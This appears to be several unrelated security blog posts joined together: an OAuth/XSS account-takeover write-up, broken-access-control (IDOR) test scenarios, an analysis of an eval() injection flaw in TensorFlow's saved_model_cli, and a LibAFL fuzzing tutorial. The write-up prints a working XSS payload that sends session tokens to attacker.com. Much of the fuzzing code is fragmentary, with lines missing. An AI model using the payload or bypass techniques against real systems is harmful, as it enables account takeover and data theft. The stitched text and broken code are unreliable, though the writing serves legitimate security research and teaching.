Exploiting OAuth: Journey to Account Takeover


Published on 19 Nov 2021

Most web and mobile applications these days use OAuth to secure their authorization endpoints. It allows them to easily grant their users access to particular resources as per the application’s requirements.


This is a write-up of a chain of vulnerabilities (OAuth Misconfiguration, CSRF, XSS, and Weak CSP) that allowed me to take over a user account using a single interaction.


This was a typical Project Management Web Application, using Microsoft’s OAuth 2.0 to authorize its users and grant them access to the application. Let’s call it – https://victim.com


OAuth 2.0 Flow


An open protocol to allow secure authorization in a simple and standard method from web, mobile and desktop applications.


It is the industry-standard protocol for authorization. OAuth 2.0 focuses on client developer simplicity while providing specific authorization flows for web applications, desktop applications, mobile phones, and living room devices.


OAuth 2.0 is an authorization protocol and NOT an authentication protocol. As such, it is designed primarily as a means of granting access to a set of resources, for example, remote APIs or user’s data.


The authentication flow of the application was such that when a user visited the Application at https://victim.com, it redirected them to Microsoft’s Authorize endpoint at https://login.microsoftonline.com/<tenant-name>.onmicrosoft.com/oauth2/v2.0/authorize?p=<policy-name>


This is where users entered their email addresses and passwords to authenticate, and after a successful OAuth flow, the user was returned to the application, which showed them the actual Dashboard.

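The redirect described above can be sketched in a few lines; the tenant, policy, client id, and redirect URI below are illustrative placeholders, not the real application’s values:

```python
from urllib.parse import urlencode, urlparse, parse_qs

def build_authorize_url(tenant: str, policy: str, client_id: str, redirect_uri: str) -> str:
    # B2C-style authorize endpoint as described above; all values passed in
    # are illustrative placeholders
    base = f"https://login.microsoftonline.com/{tenant}.onmicrosoft.com/oauth2/v2.0/authorize"
    params = {
        "p": policy,
        "client_id": client_id,
        "response_type": "code",
        "redirect_uri": redirect_uri,
        "scope": "openid",
    }
    return f"{base}?{urlencode(params)}"

url = build_authorize_url(
    "contoso", "B2C_1_signin", "abc123", "https://app.victim.com/auth/return"
)
qs = parse_qs(urlparse(url).query)
```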

The Attack


Whenever OAuth authentication is in use, the first thought crossing an attacker’s mind is to check whether the application validates the value of redirectUrl. This may lead to OAuth token stealing if the token is returned along with the callback request.


The initial request was https://app.victim.com/login?redirecturl=https://app.victim.com/dashboard, which redirected me to the Microsoft login page URL mentioned in the previous section.
So I tried to manipulate the redirectUrl, changing it to a server that I controlled to see if I would receive the tokens, but unfortunately the application was not sending any of the tokens with the callback request, which was odd.


On inspecting closely, it was observed that after returning from the OAuth flow, the application sent a request to https://app.victim.com/auth/return containing the state and token values in the POST body.
The interesting part was the response to this request. The response contained the actual tokens that the application used. These tokens were being stored in the browser’s Session Storage using JavaScript, as shown below –



The page then redirected me to –
https://app.victim.com/dashboard using window.location.replace.


This is the value from the redirectUrl parameter shown earlier in the initial request. Even though I was not able to get tokens by manipulating the redirectUrl, an attack could still have been possible if the parameter was somehow vulnerable to an XSS, allowing me to read the tokens directly either from the page source or from the session storage.


So I modified my payload to close the existing script tag and check whether injecting scripts was possible. Here’s the URL that I used –
https://app.victim.com/login?redirecturl=https://app.victim.com/dashboard</script><h1>test</h1>
and the application graciously closed the script tag for me and reflected my HTML payload.


Closed Tag

From here, it was only one more step of data exfiltration to my own server to steal the tokens and create a report.


But wait, there’s more. Now comes the part where I was stopped by the Content-Security-Policy. This is how their CSP looked when viewed on Google’s CSP Evaluator


Google CSP Evaluator

The unsafe-inline mostly does the trick in terms of inline script execution, so that’s not an issue.
This could also have been bypassed using the https://www.gstatic.com domain shown above, because it hosts Angular libraries. Here’s how that would have looked –



The thing that troubled me was the data exfiltration, because the connect-src directive only allowed connections to certain domains.
In simple terms, this means I couldn’t just make requests to my own server to receive the tokens.


The connect-src Content Security Policy (CSP) directive restricts the browser mechanisms that can make HTTP requests. This includes XMLHttpRequest (XHR / AJAX), WebSocket, fetch(), <a ping>, and EventSource. (Source: https://content-security-policy.com/connect-src/)

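For illustration, a policy of roughly this shape (the domains here are invented, not the target’s actual allowlist) reproduces the situation described: unsafe-inline lets injected scripts run, while connect-src, frame-src, and img-src pin fetch mechanisms to an allowlist:

```http
Content-Security-Policy:
    script-src 'self' 'unsafe-inline' https://www.gstatic.com;
    connect-src 'self' https://api.allowed-partner.example;
    frame-src 'self';
    img-src 'self'
```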

I tried frames and images as well, but those didn’t work either because of the frame-src and img-src directives –



If you are not allowed to connect to any external host, you can send data directly in the URL (query string) by redirecting the user to your web server. Here’s my final payload –



https://app.victim.com/login?redirecturl=https://app.victim.com/dashboard</script><script>window.location='http://attacker.com/'+document.getElementsByTagName('script')[0].outerText</script>

In the above payload, I’ve used window.location to redirect the user’s browser to my server and along with the redirection, I’m attaching the tokens present in the page using document.getElementsByTagName('script')[0].outerText


And the final result is freshly generated Session Tokens received by my netcat listener

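On the listener side, recovering the exfiltrated data is just a matter of percent-decoding the path of the incoming request line. A minimal sketch (the request line and token value are made up for illustration):

```python
from urllib.parse import unquote

# a request line as it might appear on the attacker's listener; the token
# value here is invented for illustration
request_line = "GET /%7B%22access_token%22%3A%22eyJ0est%22%7D HTTP/1.1"

def extract_exfil(request_line: str) -> str:
    # the stolen data rides in the URL path, so grab it and percent-decode it
    path = request_line.split(" ")[1]
    return unquote(path.lstrip("/"))

leaked = extract_exfil(request_line)
```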




Since this is a combination of multiple vulnerabilities, here’s how it could have been mitigated –


  1. The initial vulnerability was introduced by a misconfiguration in the OAuth flow’s redirectUrl parameter, which was never validated. It could be manipulated with ease, which introduced the main bug.
  2. The endpoint lacked CSRF protection. Along with URL validation, the endpoint should have implemented CSRF validation – an extra state parameter that is generated and validated when the authentication flow is initiated.
  3. The XSS when setting the user tokens in the session storage. This allowed me to inject scripts to execute my payload. Great resource – OWASP XSS Prevention Cheat Sheet.
  4. A weak CSP policy allowing unsafe-inline. Except for one very specific case, you should avoid using the unsafe-inline keyword in your CSP policy. As you might guess, it is generally unsafe to use unsafe-inline. (Reference)
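The state-parameter mitigation mentioned above can be sketched as follows; the function names and session model are illustrative, not the application’s actual API:

```python
import hmac
import secrets

def start_flow(session: dict) -> str:
    # generate an unguessable state value and bind it to the user's session
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    return state

def validate_callback(session: dict, returned_state: str) -> bool:
    # the state is single-use: pop it so a replay cannot succeed
    expected = session.pop("oauth_state", "")
    # constant-time comparison to avoid timing side channels
    return bool(expected) and hmac.compare_digest(expected, returned_state)

session = {}
state = start_flow(session)
ok = validate_callback(session, state)          # legitimate callback
bad = validate_callback(session, "attacker-guess")  # forged / replayed callback
```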



Broken Access Control: Pentester’s Gold Mine


Hey folks, hope you all are doing well!
Recently, the OWASP Top 10 2021 was released, and Broken Access Control grabbed the first position as the most serious security risk. Broken Access Control issues are present when restrictions are imposed only on the frontend and the backend APIs are never secured. Using easily enumerable IDs is the root cause of Insecure Direct Object References (IDORs).


In this blog, I will be mostly focusing on my approach and scenarios which I encountered.


Broken Access Control 101


Broken Access Control, in simple words, means performing actions outside the set of allowed permissions.


Whenever I test any application which has user roles, I ask myself the following questions:


  • What are the permissions of this user?


  • Does the user have permission to perform this action?


  • Can this user view this data?


  • What will be the business impact if the imposed access control can be broken?



Scenarios Encountered While Testing Applications for Broken Access Control


Let’s see some of the scenarios which I encountered.


Scenario 1 – IDOR in Password Vault


The application was a password vault. It allowed the user to store and update usernames, passwords, SSH keys, and website URLs. When I was testing the update-account functionality, the application said for the password field: “Leave blank to keep current password”.


Broken Access Control, Blank Password, Insecure Direct Object Reference, Password vault

Seeing this, I asked myself: how is it binding the password to this account?


After observing the POST request for saving the password, I came to know that the application links the passwords using a credential_id.


Broken Access Control, Credential ID, API, JSON

The POST request made me curious. So, I meddled with the request by changing the credential_id to some other id. I was surprised to see that the account got updated; however, I wondered where I could see the updated passwords. I checked the application and came across a button that tracks password history and shows passwords to the users. I was shocked to see a password that was never mine! Hence, an Insecure Direct Object Reference (IDOR) let me enumerate the passwords of all accounts in the organization, leading to a simple Broken Access Control issue.

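A server-side ownership check would have prevented this. A minimal sketch with an in-memory stand-in for the vault’s data store (names and schema are hypothetical, not the real application’s):

```python
# stand-in for the vault's credential store; schema is hypothetical
credentials = {
    101: {"owner": "alice", "password": "old-secret"},
    202: {"owner": "bob", "password": "bobs-secret"},
}

def update_password(user: str, credential_id: int, new_password: str) -> bool:
    record = credentials.get(credential_id)
    if record is None or record["owner"] != user:
        # reject: credential not found, or not owned by the requesting user
        return False
    record["password"] = new_password
    return True

ok = update_password("alice", 101, "new-secret")      # alice updates her own record
idor_attempt = update_password("alice", 202, "pwned")  # alice targets bob's record
```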

Scenario 2 – Breaking the Business Logic in Energy Tender Management Platform


In this scenario, the application was some sort of energy tender management platform, in which tenders were to be approved by higher-privileged users. Lower-privileged users could only draft a tender and submit it to the Admin for approval. One piece of business logic was imposed in this application: while any user is editing the tender details, other users cannot edit it. For example, if USER1 is editing the questionnaire, USER2 cannot; the tender is locked for USER2. When USER2 tried to open the tender for editing while USER1 was editing, the application gave the following error message:


Broken Access Control, Questionnaire Opened by other user, Business Logic

As per my assumption, the business logic behind the application was that while the Admin is approving the questionnaire, the lower-privileged user must not edit it, because when I tried updating the tender directly by making a PATCH request to the API, it responded with the following message:


Broken Access Control, Questionnaire locked, PUT method enabled, Allow header in response

While looking at the response, I discovered that the PUT method was allowed in this case. I changed the method to PUT and forwarded the request. To my surprise, the questionnaire got updated. So, by changing the method, I was able to bypass the imposed access control.


Scenario 3 – Pattern-based Shipment IDs


This application was for fleet management. This application segregates the companies into groups so that each company can view its shipments. The API request was in the following manner:



Here the id was in capital letters and eight characters long.


Now, if we think about brute-forcing it, that would be around 26^8 permutations. I dug a bit deeper to analyze whether there was any pattern in the id, and it turned out that the first four characters were the first four letters of the organization’s name and the last four characters were random.


So, for example, if the company’s name is TESTING Ltd, the id would be TESTxxxx, where x is any alphabet.


Now the permutations are lowered to 26^4. So, by knowing the name of the company, I was able to brute-force the rest of the characters and view their shipments. Analyzing the id made the number of permutations far lower and the attack practically possible. It made the IDOR feasible.

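The keyspace math above is easy to verify; the request rate used for the time estimate is a made-up figure for illustration only:

```python
# keyspace math from the scenario: 8 unknown uppercase letters vs only 4,
# once the prefix is known to be the first four letters of the company name
full_keyspace = 26 ** 8
reduced_keyspace = 26 ** 4

# time estimate at an assumed 100 requests/second (an invented rate)
hours_reduced = reduced_keyspace / 100 / 3600  # a couple of hours at most
```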

Scenario 4 – Using Database of Another User


Here the application was a project management platform. It allows users to upload databases. The user can also create projects in the application. While working on it, I observed that the dataset uploaded by the user could be associated with the project.


Broken Access Control, Attach Database, Project management platform

When I uploaded the dataset, the application responded with an integer as the dataset id. The application stores the dataset and assigns a sequential numerical integer as its id. With such IDs, there is a possibility of IDOR.


Broken Access Control,Database id, Insecure Direct Object Reference

So, while creating the project, I observed that the application was passing a dataset id. I changed it to the dataset of another user and successfully saved the project. Hence, I was able to attach another user’s database to my project.


Scenario 5 – Analyzing the Flow of Requests


In this case, the application was for entity and database management. It had a view-only user and an admin role. There were many vulnerable modules in this application. I was trying to perform all the CRUD operations from the view-only user’s session. The operation that grabbed my attention was DELETE. The application implemented a two-step delete process:


First, it sent a request to the delete endpoint, which redirected to the confirm-delete endpoint, and the response also set some cookies.


Next, using these cookies, the application sent a request to the confirm-delete endpoint and the entity was deleted. There was no entity id present in the request, so it was using the cookies assigned in step 1 to identify the entity to be deleted.


Using the view-only user’s cookies, I first sent a request to the delete endpoint with the entity id to delete, copied the cookies obtained in the response, and then sent a request to the confirm-delete endpoint. By understanding the flow of requests in the application, I was able to break the imposed access control.


Key Takeaways


For Security Researchers:


  • Dig deeper into the application and understand the flow of requests.


  • Observe the requests closely and try to understand the significance of each parameter in the request.


  • If you are given more than 2 roles, don’t always focus only on the least and the most privileged roles. There can also be access control flaws in the mid-privileged roles.


  • Try to understand the application, use all the functionalities, and then focus on finding flaws in one functionality at a time. Dig as deep as you can.


  • Reading the application’s documentation helps a lot in understanding the core logic and the permissions of the various roles, assisting you in discovering broken access control issues.


For Developers:


  • Whenever you are developing an application, don’t impose access controls on the frontend only.


  • Impose Access control checks on the API endpoints too.


  • Always keep in mind to have server-side checks for the access control before committing the operation.


  • Use GUIDs for referencing the objects.

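The GUID suggestion can be sketched in one line with Python’s uuid module; the helper name is illustrative:

```python
import uuid

def new_object_id() -> str:
    # uuid4 is randomly generated; unlike sequential integers, one id reveals
    # nothing about its neighbours and the space is far too large to enumerate
    return str(uuid.uuid4())

a, b = new_object_id(), new_object_id()
```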

As Albert Einstein once said:


“If I had an hour to solve a problem and my life depended on the solution, I would spend the first 55 minutes determining the proper question to ask, for once I know the proper question, I could solve the problem in less than five minutes.”


Questioning properly helps you analyze how the application behaves and come up with various unique test cases. There are misconfigurations in many places. Many times the access control is imposed only on the frontend, so checking the APIs or POST requests can reveal the issues.


Analysis of a Code Injection Vulnerability in TensorFlow's saved_model_cli


saved_model_cli's main purpose is working with saved models. The program ships by default when TensorFlow is installed; who knows how many people have ever used it.


(base) [~] saved_model_cli run -h                                     21:24:46
usage: saved_model_cli run [-h] --dir DIR --tag_set TAG_SET --signature_def
                           SIGNATURE_DEF_KEY [--inputs INPUTS]
                           [--input_exprs INPUT_EXPRS]
                           [--input_examples INPUT_EXAMPLES] [--outdir OUTDIR]
                           [--overwrite] [--tf_debug] [--worker WORKER]

Usage example:
To run input tensors from files through a MetaGraphDef and save the output tensors to files:
$saved_model_cli show --dir /tmp/saved_model --tag_set serve \
--signature_def serving_default \
--inputs input1_key=/tmp/124.npz[x],input2_key=/tmp/123.npy \
--input_exprs 'input3_key=np.ones(2)' \
--input_examples 'input4_key=[{"id":[26],"weights":[0.5, 0.5]}]' \



def preprocess_input_examples_arg_string(input_examples_str):
    input_dict = preprocess_input_exprs_arg_string(input_examples_str)


def preprocess_input_exprs_arg_string(input_exprs_str):
    input_dict = {}

    for input_raw in filter(bool, input_exprs_str.split(';')):
        input_key, expr = input_raw.split('=', 1)
        # ast.literal_eval does not work with numpy expressions
        input_dict[input_key] = eval(expr)  # pylint: disable=eval-used
    return input_dict


This vulnerability was fixed in TensorFlow 2.7.0 and assigned CVE-2021-41228.
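The difference between eval and ast.literal_eval is easy to demonstrate. The fix shipped in TensorFlow 2.7.0 moved this parsing away from bare eval; the snippet below is a standalone illustration of the underlying problem, not the actual patch:

```python
import ast

# eval() executes arbitrary expressions, while ast.literal_eval() only
# accepts Python literals and rejects anything with side effects
malicious = "__import__('os').getcwd()"

evaluated = eval(malicious)  # runs attacker-controlled code, returns a path string

try:
    ast.literal_eval(malicious)
    rejected = False
except ValueError:
    rejected = True  # literal_eval refuses to evaluate the expression
```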





Fuzzing101 with LibAFL – Part 1.5: Speed Improvements to Part I

Link: https://epi052.gitlab.io/notes-to-self/blog/2021-11-07-fuzzing-101-with-libafl-part-1.5/

Twitter user Antonio Morales created the Fuzzing101 repository in August 2021. In the repo, he has created exercises and solutions meant to teach the basics of fuzzing to anyone who wants to learn how to find vulnerabilities in real software projects. The repo focuses on the use of AFL++, but this series of posts aims to solve the exercises using LibAFL instead. We'll explore the library and write fuzzers in Rust in order to solve the challenges in a way that closely aligns with the suggested AFL++ usage.

Since this series will be looking at Rust source code and building fuzzers, I'll assume a certain level of knowledge in both areas for the sake of brevity. If you need a brief intro/refresher on coverage-guided fuzzing, check here. As always, feel free to reach out if you have any questions.

This post will cover some ways to improve the speed of the fuzzer from Part I of this series. The companion code for this exercise can be found in my fuzzing-101-solutions repository.

Previous posts: – Part I: Fuzzing Xpdf



  "Fuzzer": {
    "type": "StdFuzzer",
    "Corpora": {
      "Input": "InMemoryCorpus",
      "Output": "OnDiskCorpus"
    },
    "Input": "BytesInput",
    "Observers": [ … ],
    "Feedbacks": {
      "Pure": ["MaxMapFeedback", "TimeFeedback"],
      "Objectives": ["MapFeedbackState", "TimeoutFeedback"]
    },
    "State": "StdState",
    "Monitor": "MultiMonitor",
    "EventManager": "LlmpRestartingEventManager",
    "Scheduler": "IndexesLenTimeMinimizerCorpusScheduler",
    "Executor": "TimeoutExecutor<InProcessExecutor>",
    "Mutators": ["havoc_mutations"],
    "Stages": ["StdMutationalStage"]
  }



If you want to go really fast while fuzzing, you generally want an in-process executor rather than a forkserver.

For the first post, I wanted to keep things relatively simple. In my opinion, one process executing another as its child is a bit easier to wrap your head around than how in-process execution works, especially when you're new to all this fuzzing stuff. Also, afl++ uses a forkserver unless you enable persistent mode (which is another way of saying "in-process executor").

I was already considering writing about improving Part 1's fuzzer performance before @domenuk made his suggestion, but his comment sealed my fate. So, here we go; we'll improve the performance of our first fuzzer by:

  • Swapping out afl-clang-fast for afl-clang-lto in the compilation process
  • Passing input to the program via shared memory instead of a file on disk
  • Implementing an in-process executor instead of a forkserver


Step 1: Compiler Swap

This section deals with using afl-clang-lto instead of afl-clang-fast. But why? I'm glad you asked! Here's an excerpt of the TL;DR from the afl++ documentation on afl-clang-lto:

  • Use afl-clang-lto/afl-clang-lto++ because it is faster and provides better coverage than anything else out there in the AFL world
  • You can use it together with llvm_mode: laf-intel and the instrument file list feature, and it can be combined with cmplog/Redqueen

In case you're not familiar with adding a dictionary to a fuzzer, here's another excerpt from the same documentation:

AUTODICTIONARY feature: While compiling, a dictionary based on string comparisons is automatically generated and put into the target binary. This dictionary is transferred to afl-fuzz on start. This improves coverage statistically by 5-10%

So, by switching to afl-clang-lto, we get a faster fuzzer with increased code coverage. If you need more convincing, it's also what the afl++ documentation says to use, provided your system and target support it.



Currently, the build script uses afl-clang-fast to instrument Xpdf, so that's where we'll start making changes. Instead of just swapping the compiler, we'll build two Xpdfs, so we can compare the two and see whether our changes improve speed.

If you read the first post in this series, you may recall that our build script performs the configure, make, and make install steps to build xpdf. All we're going to do is perform those steps twice, once per compiler. We'll then store the builds in separate folders (built-with-(lto|fast)).

for (build_dir, compiler) in [("fast", "afl-clang-fast"), ("lto", "afl-clang-lto")] {
    // configure with `compiler` and set install directory to ./xpdf/built-with-`build_dir`
        .arg(&format!("--prefix={}/built-with-{}", xpdf_dir, build_dir))
        .env("CC", format!("/usr/local/bin/{}", compiler))
        .env("CXX", format!("/usr/local/bin/{}++", compiler))
            "Couldn't configure xpdf to build using afl-clang-{}",

    // make && make install
        .expect("Couldn't make xpdf");

        .expect("Couldn't install xpdf");

We also need to update our make clean command to handle the new build directories.

// clean doesn't know about the built-with-* directories we use to build, remove them as well
    .arg(&format!("{}/built-with-lto", xpdf_dir))
    .arg(&format!("{}/built-with-fast", xpdf_dir))
    .expect("Couldn't clean xpdf's built-with-* directories");



Next, let's jump over to the fuzzer's source. In it, we can see that in Part One we hardcoded the path to pdftotext into our ForkserverExecutor.

let fork_server = ForkserverExecutor::new(
    String::from("./xpdf/install/bin/pdftotext"),

Since we're compiling two versions of pdftotext, it would be cool if we could switch between them without recompiling the fuzzer. To make that dream a reality, let's add a command line option that controls the path to pdftotext.

Even though we're in the main.rs portion of things, we need to add the clap crate as a dependency, so let's take a quick detour to do that.

exercise-1/Cargo.toml

libafl = {version = "0.6.1"}
clap = "3.0.0-beta.5"

Ok, back to main.rs; let's write a quick function that will parse lto or fast from the command line and return the choice as a String.

use clap::{App, Arg};


/// parse -c/--compiler from cli; return "fast" or "lto"
fn get_compiler_from_cli() -> String {
    let matches = App::new("fuzzer")
                .possible_values(&["fast", "lto"])
                .about("choose your afl-clang variant (default: fast)")


With the function written, we can call it from main and update the path in the ForkserverExecutor.

fn main() {
    let compiler = get_compiler_from_cli();

    // Component: Corpus
    let fork_server = ForkserverExecutor::new(
        format!("./xpdf/built-with-{}/bin/pdftotext", compiler),
        // we're passing testcases via on-disk file; set to use_shmem_testcase to false
        tuple_list!(edges_observer, time_observer),



To see whether our changes have any effect, we need some kind of comparison. We can write a quick shell script that does the following:

  • Run each fuzzer a few times for a given timeout
  • For each run, note the total number of executions
  • Divide the number of executions by the timeout
  • Average all the runs together
  • Spit out the results


exercise-1/time-comparison.sh


function exec-fuzzer() {
  # parameters:
  #   fuzzer: should be either "lto" or "fast"
  #   timeout: in seconds
  #   cpu: which core to bind, default is 7
  local fuzzer="${1}"
  local timeout="${2}"
  declare -i cpu="${3:-7}"

  # last_update should look like this
  # [Stats #0] clients: 1, corpus: 425, objectives: 0, executions: 23597, exec/sec: 1511
  last_update=$(timeout "${timeout}" taskset -c "${cpu}" ../target/release/exercise-one-solution -c "${fuzzer}" | grep Stats | tail -1)

  # regex + cut below will return the total # of executions
  total_execs=$(echo $last_update | egrep -o "executions: ([0-9]+)" | cut -f2 -d' ')

  # executions divided by runtime gives us execs/sec
  declare -i execs_per_sec=$((total_execs / timeout))
  echo $execs_per_sec
}

function average_of_five_runs() {
  # parameters:
  #   fuzzer: should be either "lto" or "fast"
  local fuzzer="${1}"
  local timeout=30  # seconds per run (the original value isn't shown in the excerpt)
  declare -i total_execs_per_sec=0
  declare -i total_runs=5

  for i in $(seq 1 "${total_runs}"); do
    current=$(exec-fuzzer "${fuzzer}" "${timeout}")
    echo "[${fuzzer}][${i}] - ${current} execs/sec"
    total_execs_per_sec+="${current}"
  done

  final=$((total_execs_per_sec / total_runs))
  echo "[${fuzzer}][avg] - ${final} execs/sec"
}

average_of_five_runs fast
average_of_five_runs lto




[fast][1] - 1129 execs/sec
[fast][2] - 970 execs/sec
[fast][3] - 1050 execs/sec
[fast][4] - 1112 execs/sec
[fast][5] - 1096 execs/sec
[fast][avg] - 1071 execs/sec
[lto][1] - 1016 execs/sec
[lto][2] - 1246 execs/sec
[lto][3] - 1151 execs/sec
[lto][4] - 1208 execs/sec
[lto][5] - 1217 execs/sec
[lto][avg] - 1167 execs/sec

We can see that over the course of five runs, the lto fuzzer is roughly 9% faster! It may not seem like much, but it's nothing to sneeze at. We'll chalk it up as a win and move on to the next improvement.
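The averages in the output above can be sanity-checked in a few lines, mirroring the shell script's integer division:

```python
# per-run execs/sec taken from the benchmark output above
fast_runs = [1129, 970, 1050, 1112, 1096]
lto_runs = [1016, 1246, 1151, 1208, 1217]

fast_avg = sum(fast_runs) // len(fast_runs)  # integer division, as in the script
lto_avg = sum(lto_runs) // len(lto_runs)

speedup = (lto_avg - fast_avg) / fast_avg  # the ~9% improvement quoted above
```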


  • Grab a testcase from the corpus
  • Mutate the testcase
  • Write the mutated testcase to disk (.cur_input)
  • fork/exec a new child process (./pdftotext ./.cur_input)
    • the child reads .cur_input from disk
  • Repeat

Our goal in implementing shared-memory fuzzing is to remove the reads from and writes to disk. Instead, our testcases will be pulled from the InMemoryCorpus, mutated in memory, and passed to the fuzz target (pdftotext) via a shared memory mapping. The process isn't very difficult, since afl includes some helpful macros to assist with the task. It boils down to finding likely places in the source code where we can insert the following macros.

__AFL_FUZZ_INIT();  // after #includes, before main

// typically in main
unsigned char *buf = __AFL_FUZZ_TESTCASE_BUF;
int len = __AFL_FUZZ_TESTCASE_LEN;

The AFL++ documentation says the usual speed increase observed after adding shared-memory fuzzing is typically about a 2x performance gain. Let's see if we can hit that mark.


We'll start by modifying our fuzzer, since that's the simplest change we need to make for this improvement. All we really need to do is update the ForkserverExecutor's use_shmem_testcase parameter from false to true, and then remove the @@ argument from pdftotext's arguments.

let fork_server = ForkserverExecutor::new(
    format!("./xpdf/built-with-{}/bin/pdftotext", compiler),
    // we're passing testcases via shmem; set to use_shmem_testcase to true
    tuple_list!(edges_observer, time_observer),


Investigating Xpdf

To drag our fuzzer into the shared-memory future, we'll need to modify some Xpdf source code. The modifications we make here are necessarily Xpdf-specific, but the general steps should be the same for other fuzz targets. Our first task is to read through the source to figure out how and where our input file gets parsed. The goal is to replace the file-reading logic with the unsigned char *buf macro we saw earlier.

We'll begin our hunt in pdftotext.cc's main function. The main function starts off by declaring variables, parsing command line values, and setting up its global state via a config file. None of that is very interesting to us (for now), but after the initial setup, we see where the PDFDoc gets created.


int main(int argc, char *argv[]) {
  PDFDoc *doc;
  GString *fileName;
  doc = new PDFDoc(fileName, ownerPW, userPW);

The fileName variable is passed into the PDFDoc constructor, so the read of the file from disk very likely happens somewhere in the PDFDoc code.

Here we see the PDFDoc constructor in PDFDoc.h –


class PDFDoc {

  PDFDoc(GString *fileNameA, GString *ownerPassword = NULL,
	  GString *userPassword = NULL, void *guiDataA = NULL);

and the implementation in PDFDoc.cc –


PDFDoc::PDFDoc(GString *fileNameA, GString *ownerPassword,
	       GString *userPassword, void *guiDataA) {
  Object obj;
  GString *fileName1, *fileName2;
  fileName = fileNameA;
  fileName1 = fileName;
  if (!(file = fopen(fileName1->getCString(), "rb"))) {
  // create stream
  str = new FileStream(file, 0, gFalse, 0, &obj);

  ok = setup(ownerPassword, userPassword);

In the implementation, we can trace the fileNameA parameter all the way to the FileStream constructor. That breadcrumb leads us to Stream.cc. Unfortunately for us, FileStream is a user-defined class wrapping IO-stream-related functionality. It doesn't use an unsigned char array the way we need in order to set up the macros discussed above.



MemStream::MemStream(char *bufA, Guint startA, Guint lengthA, Object *dictA):
    BaseStream(dictA) {
  buf = bufA;
  start = startA;
  length = lengthA;
  bufEnd = buf + start + length;
  bufPtr = buf + start;
  needFree = gFalse;

We're also lucky in that MemStream has the same API as FileStream, which makes it a drop-in replacement. All we need to do is swap the FileStream constructor in PDFDoc for the MemStream constructor, and we should be good to go. Let's get to it!


With the analysis out of the way, not many changes are needed. First, we need to add an include for unistd, since one of the macros ends up needing it. While we're near the top of the file, we can also insert the __AFL_FUZZ_INIT macro below the #includes and above the PDFDoc constructor.

#include <unistd.h>
#define headerSearchSize 1024	// read this many bytes at beginning of
				//   file to look for '%PDF'


// PDFDoc

PDFDoc::PDFDoc(GString *fileNameA, GString *ownerPassword,
	       GString *userPassword, void *guiDataA) {

With that done, we can change the constructor to use a MemStream. Also, there's a bunch of code related to writing output files (which we aren't using, but which gets triggered anyway by the default case), so we'll go ahead and remove it. With the output-file code removed, the constructor looks like this in its entirety.

PDFDoc::PDFDoc(GString *fileNameA, GString *ownerPassword,
	       GString *userPassword, void *guiDataA) {
  Object obj;
  GString *fileName1, *fileName2;

  ok = gFalse;
  errCode = errNone;

  guiData = guiDataA;

  file = NULL;
  str = NULL;
  xref = NULL;
  catalog = NULL;
  outline = NULL;

  unsigned char *buf = __AFL_FUZZ_TESTCASE_BUF;
  int len = __AFL_FUZZ_TESTCASE_LEN;

  // create stream

  str = new MemStream((char *) buf, 0, (Guint) len, &obj);
  ok = setup(ownerPassword, userPassword);




  exitCode = 99;

  // parse args
  ok = parseArgs(argDesc, &argc, argv);
  if (!ok || argc < 2 || argc > 3 || printVersion || printHelp) {
    fprintf(stderr, "pdftotext version %s\n", xpdfVersion);
    fprintf(stderr, "%s\n", xpdfCopyright);
    if (!printVersion) {
      printUsage("pdftotext", "<PDF-file> [<text-file>]", argDesc);
    goto err0;
  fileName = new GString(argv[1]);

  // read config file
  globalParams = new GlobalParams(cfgFileName);



After recompiling Xpdf and our fuzzer, we see a pretty significant speed boost! A random sampling of the output shows that we're in the neighborhood of a 2x speedup, which is exactly what we were hoping for.

cargo make clean
cargo build --release
taskset -c 6 ../target/release/exercise-one-solution -c lto
[Stats #0] clients: 1, corpus: 615, objectives: 0, executions: 567834, exec/sec: 1961
[Stats #0] clients: 1, corpus: 615, objectives: 0, executions: 567834, exec/sec: 2040
[Testcase #0] clients: 1, corpus: 616, objectives: 0, executions: 570189, exec/sec: 2261
[Stats #0] clients: 1, corpus: 616, objectives: 0, executions: 571831, exec/sec: 2270
[Stats #0] clients: 1, corpus: 616, objectives: 0, executions: 575641, exec/sec: 2203
[Stats #0] clients: 1, corpus: 616, objectives: 0, executions: 575641, exec/sec: 2185

But wait, there's more! We can strip even more code out of pdftotext.cc's main function and go even faster. The first comment and the first line of code below it let us know we're reading a file from disk, so let's get rid of that.

  // read config file
  globalParams = new GlobalParams(cfgFileName);
  if (textEncName[0]) {
  if (textEOL[0]) {
    if (!globalParams->setTextEOL(textEOL)) {
      fprintf(stderr, "Bad '-eol' value on command line\n");
  if (noPageBreaks) {
  if (quiet) {
  // get mapping to output encoding
  if (!(uMap = globalParams->getTextEncoding())) {
    error(-1, "Couldn't get text encoding");
    delete fileName;
    goto err1;

There's also this bit of code that writes the converted pdf out to its text file. Let's put that out to pasture as well.

  // write text file
  textOut = new TextOutputDev(textFileName->getCString(),
			      physLayout, rawOrder, htmlMeta);
  if (textOut->isOk()) {
    doc->displayPages(textOut, firstPage, lastPage, 72, 72, 0,
		      gFalse, gTrue, gFalse);
  } else {
    delete textOut;
    exitCode = 2;
    goto err3;
  delete textOut;

The rest of main could be cleaned up to remove anything not directly related to PDFDoc and its methods, but we'll leave it alone for now. After recompiling Xpdf, we can fire up the fuzzer again.

[Stats #0] clients: 1, corpus: 438, objectives: 0, executions: 54787, exec/sec: 3378
[Testcase #0] clients: 1, corpus: 439, objectives: 0, executions: 55233, exec/sec: 3430
[Stats #0] clients: 1, corpus: 439, objectives: 0, executions: 55233, exec/sec: 3478
[Testcase #0] clients: 1, corpus: 440, objectives: 0, executions: 55386, exec/sec: 3528
[Stats #0] clients: 1, corpus: 440, objectives: 0, executions: 55386, exec/sec: 3575
[Testcase #0] clients: 1, corpus: 441, objectives: 0, executions: 55458, exec/sec: 3621
[Stats #0] clients: 1, corpus: 441, objectives: 0, executions: 55733, exec/sec: 3581
[Stats #0] clients: 1, corpus: 441, objectives: 0, executions: 55733, exec/sec: 3542

Not bad! Roughly a 3x speedup without much effort beyond the initial analysis. Things are looking pretty good now, but we can probably do even better by swapping out our executor, which we'll look at next.

Step 3: Executor Swap

The final step in our search for the elusive "performance" that @gamozolabs is always talking about is to swap our ForkserverExecutor for an InProcessExecutor. The structure of an in-process fuzzer is quite different from what we've used so far. Our current fuzzer is a standalone binary that executes an external program over and over. In the sections that follow, we'll leave that paradigm behind.

Our plan of attack is to create a fuzz target (harness.cc) and a LibAFL-backed compiler (compiler.rs) that we'll use to compile the fuzz target. We'll also modify our standalone fuzzer so that it becomes a static library, which we'll link into our fuzz target using our compiler.

